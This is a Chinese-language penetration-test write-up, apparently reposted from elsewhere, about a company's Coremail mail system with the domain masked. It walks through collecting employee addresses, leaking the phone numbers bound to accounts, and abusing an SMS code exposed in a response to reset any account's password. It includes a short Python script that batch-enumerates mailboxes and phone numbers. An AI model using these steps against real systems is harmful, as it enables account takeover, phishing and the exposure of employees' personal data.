目前分析

?

1、地址：https://mail.*****com/coremail/

分析:

登錄功能和忘記密碼功能;

目前站點是郵箱系統。方向：爆破、邏輯漏洞-密碼找回

信息收集

1、google通過域名收集相關網站獲取郵箱信息，inur:***

2.經過多個郵箱信息收集，發現郵箱命名規則

密碼找回

輸入獲取到的郵箱，點擊獲取郵箱的手機號碼，并進行 抓放

返回綁定的手機號碼，信息泄露，如果失敗時返回錯誤的

在點擊 【獲取短信內容】，發現有個**code的內容，四位數，可能是驗證碼，把這個驗證碼輸入進去，成功了。? ? [是它是它，就是它]

輸入驗證碼，下一步成功了，說明是正確的，重置任意賬戶郵箱密碼

PYTHON可批量獲取手機號碼

1、收集當前公司員工名字轉換成拼音

2、手機公布的郵箱信息

只是簡單寫一下獲取手機號碼 判斷郵箱用戶真實

import requests import json ''' 通過郵箱轉換批量獲取手機號碼和獲取正確的郵箱 '''headers={ 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0', 'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Connection': 'close', 'Origin':'https://mail.******.com', 'Referer':'https://mail.******.com/coremail/changepwd.jsp?uid=', 'Host':'crm.******.com:80', 'Content-Length': '61' }def poststrfox():name='***name'mail=name+'@******.com'data = {'mail': mail,'lyPass': 'q76a5e96JIQwRMqTTtzWMA=='}url='https://crm.******.com:80/getPhone'req = requests.port(url=url,data=data,headers=headers)rtext = req.textdic_jsdict = json.loads(rtext) #返回的是json格式的，所以需要轉換一下message = dic_jsdict['message']print(message, '|', mail)poststrfox()

危害/修復：

1、可以爆破獲取用戶名

2、通過用戶可以獲取手機號碼，信息泄露

3、可以重置任意賬戶郵箱密碼，包括高管的郵箱手機號碼，獲取郵箱權限，可干的事情很多，釣魚等。

修復建議

升級當前郵件系統

總結

以上是生活随笔為你收集整理的某公司邮件系统的安全检测的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。